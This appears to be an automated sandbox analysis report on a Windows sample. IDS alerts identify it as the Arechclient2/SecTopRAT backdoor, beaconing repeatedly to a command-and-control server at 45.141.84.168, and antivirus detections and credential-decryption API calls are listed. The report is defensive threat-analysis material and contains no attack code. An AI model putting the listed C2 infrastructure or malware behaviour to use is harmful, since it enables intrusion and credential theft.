                  2024-11-28T13:40:07.209428+010028033053Unknown Traffic192.168.2.44976945.141.84.1689000TCP
                  2024-11-28T13:40:15.290685+010028033053Unknown Traffic192.168.2.44980045.141.84.1689000TCP
                  2024-11-28T13:40:16.843353+010028033053Unknown Traffic192.168.2.44980445.141.84.1689000TCP
                  2024-11-28T13:40:21.491941+010028033053Unknown Traffic192.168.2.44981345.141.84.1689000TCP
                  2024-11-28T13:40:24.716158+010028033053Unknown Traffic192.168.2.44982545.141.84.1689000TCP
                  2024-11-28T13:40:27.922756+010028033053Unknown Traffic192.168.2.44983445.141.84.1689000TCP
                  2024-11-28T13:40:29.509919+010028033053Unknown Traffic192.168.2.44983945.141.84.1689000TCP
                  2024-11-28T13:40:31.058977+010028033053Unknown Traffic192.168.2.44984145.141.84.1689000TCP
                  2024-11-28T13:40:32.661092+010028033053Unknown Traffic192.168.2.44984645.141.84.1689000TCP
                  2024-11-28T13:40:34.291194+010028033053Unknown Traffic192.168.2.44985245.141.84.1689000TCP
                  2024-11-28T13:40:35.841017+010028033053Unknown Traffic192.168.2.44985545.141.84.1689000TCP
                  2024-11-28T13:40:37.477393+010028033053Unknown Traffic192.168.2.44986045.141.84.1689000TCP
                  2024-11-28T13:40:39.010162+010028033053Unknown Traffic192.168.2.44986545.141.84.1689000TCP
                  2024-11-28T13:40:40.650289+010028033053Unknown Traffic192.168.2.44987045.141.84.1689000TCP
                  2024-11-28T13:40:44.886131+010028033053Unknown Traffic192.168.2.44987945.141.84.1689000TCP
                  2024-11-28T13:40:46.480623+010028033053Unknown Traffic192.168.2.44988245.141.84.1689000TCP
                  2024-11-28T13:40:54.387585+010028033053Unknown Traffic192.168.2.44990445.141.84.1689000TCP
                  2024-11-28T13:40:56.948683+010028033053Unknown Traffic192.168.2.44990945.141.84.1689000TCP
                  2024-11-28T13:41:01.702921+010028033053Unknown Traffic192.168.2.44991545.141.84.1689000TCP
                  2024-11-28T13:41:06.339533+010028033053Unknown Traffic192.168.2.44991945.141.84.1689000TCP
                  2024-11-28T13:41:11.106439+010028033053Unknown Traffic192.168.2.44992245.141.84.1689000TCP
                  2024-11-28T13:41:21.794007+010028033053Unknown Traffic192.168.2.44993045.141.84.1689000TCP
                  2024-11-28T13:41:28.338995+010028033053Unknown Traffic192.168.2.44993645.141.84.1689000TCP
                  2024-11-28T13:41:31.951857+010028033053Unknown Traffic192.168.2.44993945.141.84.1689000TCP
                  2024-11-28T13:41:34.556172+010028033053Unknown Traffic192.168.2.44994045.141.84.1689000TCP
                  2024-11-28T13:41:39.334890+010028033053Unknown Traffic192.168.2.44994445.141.84.1689000TCP
                  2024-11-28T13:41:48.939972+010028033053Unknown Traffic192.168.2.44995045.141.84.1689000TCP
                  2024-11-28T13:41:52.084298+010028033053Unknown Traffic192.168.2.44995345.141.84.1689000TCP
                  2024-11-28T13:41:56.785166+010028033053Unknown Traffic192.168.2.44995645.141.84.1689000TCP
                  2024-11-28T13:42:12.910159+010028033053Unknown Traffic192.168.2.44996745.141.84.1689000TCP
                  2024-11-28T13:42:19.424083+010028033053Unknown Traffic192.168.2.44997145.141.84.1689000TCP
                  2024-11-28T13:42:21.027305+010028033053Unknown Traffic192.168.2.44997245.141.84.1689000TCP
                  2024-11-28T13:42:40.242100+010028033053Unknown Traffic192.168.2.44998545.141.84.1689000TCP
                  2024-11-28T13:42:57.716050+010028033053Unknown Traffic192.168.2.44999645.141.84.1689000TCP
                  2024-11-28T13:42:59.342861+010028033053Unknown Traffic192.168.2.44999745.141.84.1689000TCP
                  2024-11-28T13:43:02.486801+010028033053Unknown Traffic192.168.2.44999945.141.84.1689000TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Kyuo21uNlG.exeAvira: detected
                  Source: Kyuo21uNlG.exeReversingLabs: Detection: 68%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: Kyuo21uNlG.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069ED5BC CryptUnprotectData,0_2_069ED5BC
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 0_2_069EDDC0 CryptUnprotectData,0_2_069EDDC0
                  Source: Kyuo21uNlG.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\Kyuo21uNlG.exeCode function: 4x nop then jmp 06A2E15Dh0_2_06A2DB35

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49730 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49734 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49738 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49743 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49753 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49732 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49735 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49739 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49755 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49736 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49752 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49749 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49747 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49731 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49744 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49759 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49730
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49754 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49757 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49733 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49741 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49750 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49763 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49764 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49761 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49762 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49767 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49756 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49760 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49768 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49758 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49766 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49783 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49793 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49798 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49765 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49737 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49800 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49787 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49804 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49808 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49821 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49825 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49828 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49834 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49839 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49841 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49846 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49852 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49769 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49855 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49860 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49865 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49870 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49813 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49873 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49879 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49882 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49890 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49888 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49892 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49896 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49901 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49900 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49906 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49890
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49904 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49906
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49909 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49913 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49912 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49914 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49916 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49917 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49916
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49913
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49919 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49915 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49918 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49920 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49921 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49922 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49923 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49924 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49925 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49926 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49927 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49929 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49931 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49923
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49930 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49933 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49934 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49935 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49936 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49938 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49937 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49939 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49940 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49941 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49942 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49943 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49944 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49938
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49945 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49946 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49947 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49948 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49943
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49949 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49951 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49950 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49953 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49954 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49932 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49955 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49956 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49951
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49957 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49932
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49958 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49959 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49961 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49960 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49962 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49961
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49964 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49965 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49967 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49968 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49970 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49969 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49971 -> 45.141.84.168:9000
